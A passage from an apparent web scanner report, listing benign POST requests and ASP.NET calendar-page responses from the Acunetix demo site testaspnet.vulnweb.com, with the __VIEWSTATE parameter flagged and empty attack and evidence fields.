Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8616&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBACr99lNsIZGRkul%2BI%2BicguizPasOjOJYVZY0mWWQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw0%2B%2BmDAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZ4OBTfhRP8t%2Btcos%2Fvt42ULHq0Ug%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:16 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBACr99lNsIZGRkul+I+icguizPasOjOJYVZY0mWWQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw0++mDAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZ4OBTfhRP8t+tcos/vt42ULHq0Ug==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:White" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8620&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAsWiil9sIZGRk8RnbuKc5Ta2Vyg1pTuZGArxIbRo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkotzsBQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb1SkSizFkFLYNXfKEb2XUH7CIE6w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:57 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAsWiil9sIZGRk8RnbuKc5Ta2Vyg1pTuZGArxIbRo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkotzsBQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb1SkSizFkFLYNXfKEb2XUH7CIE6w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:White" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
